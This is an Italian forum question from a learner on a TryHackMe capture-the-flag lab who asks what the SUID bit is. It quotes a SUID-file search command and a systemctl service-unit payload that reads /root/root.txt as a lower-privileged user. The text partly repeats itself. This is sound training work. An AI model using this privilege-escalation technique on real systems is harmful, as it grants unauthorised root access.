Sto facendo questa esercitazione su TryHackMe: https://tryhackme.com/room/vulnversity
Non ho chiaro l'ultimo passaggio (privilege escalation) dopo aver caricato la reverse shell per prendere il controllo del web server.
Sono riuscito a ottenere il flag finale seguendo questo walkthrough ma non ho ben capito alcuni concetti dei passaggi.
Tramite questo comando trovo tutti i file con il bit SUID settato, tra cui /bin/systemctl dal quale procedere con l'escalation.
Adesso arrivo al mio dubbio, cos'è precisamente questo bit SUID? Ho sempre visto i permessi dei file
Questo codice (che non ho ben chiaro al 100%) mi fa ottenere il flag che viene copiato in /tmp/output/ :
Riesco a ottenere il flag solo facendo cat /tmp/output/ ma non posso accedere a root/root.txt in quanto non risulto user root (facendo
grazie per le risposte
Non ho chiaro l'ultimo passaggio (privilege escalation) dopo aver caricato la reverse shell per prendere il controllo del web server.
Sono riuscito a ottenere il flag finale seguendo questo walkthrough ma non ho ben capito alcuni concetti dei passaggi.
find / -user root -perm -4000 -exec ls -ldb {} \;
Tramite questo comando trovo tutti i file con il bit SUID settato, tra cui /bin/systemctl dal quale procedere con l'escalation.
Adesso arrivo al mio dubbio, cos'è precisamente questo bit SUID? Ho sempre visto i permessi dei file
rwx
qui invece sono rws
cosa vuole significare nello specifico?Questo codice (che non ho ben chiaro al 100%) mi fa ottenere il flag che viene copiato in /tmp/output/ :
TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" [Install] WantedBy=multi-user.target' > $TF /bin/systemctl link $TF /bin/systemctl enable --now $TF
Riesco a ottenere il flag solo facendo cat /tmp/output/ ma non posso accedere a root/root.txt in quanto non risulto user root (facendo
whoami
ritorna www-data)grazie per le risposte